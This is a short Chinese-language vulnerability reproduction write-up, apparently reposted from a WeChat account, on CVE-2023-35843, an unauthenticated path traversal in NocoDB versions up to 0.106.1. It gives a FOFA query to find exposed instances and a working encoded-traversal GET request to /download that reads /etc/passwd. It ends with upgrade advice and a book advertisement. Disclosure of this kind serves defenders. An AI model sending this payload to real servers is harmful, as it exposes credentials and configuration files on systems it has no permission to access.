0x00 团队声明
该漏洞为我团队漏洞监测平台发现,仅供学习参考使用,请勿用作违法用途,否则后果自负。
0x01 漏洞概述
NocoDB是一个免费的开源工具,可以在任何数据库上创建智能电子表格和 REST APIs。NocoDB 的工作原理是连接到任何关系数据库并将它们转换为智能电子表格界面。NocoDB目前适用于MySQL、PostgreSQL、Microsoft、SQLServer、SQLite、Amazon Aurora 和 MariaDB 数据库。
NocoDB存在路径遍历漏洞,未经身份验证的攻击者可以通过操纵/download路由的路径参数来访问服务器上的任意文件。此漏洞允许攻击者访问服务器上的敏感文件和数据,包括配置文件、源代码和其他敏感信息。
0x02 影响版本
NocoDB<=0.106.1
0x03 漏洞复现
fofa语法:title=“NocoDB”
通过BP替换Payload内容:
/download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
改包加入Payload
GET/download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
攻击成功!读取到了passwd文件信息。
0x04 修复建议
1.建议升级至最新版本
2.限制目录访问
~关注我们~
CentOS7系统即将寿终正寝,RCS-TEAM团队为广大读者、粉丝编著的《Linux私教课 技术内核与企业运维篇》已经由清华大学出版社进行出版。
官方正版购书渠道
https://item.jd.com/14058912.html
原文始发于微信公众号(小白嘿课):CVE-2023-35843 NocoDB 任意文件读取漏洞
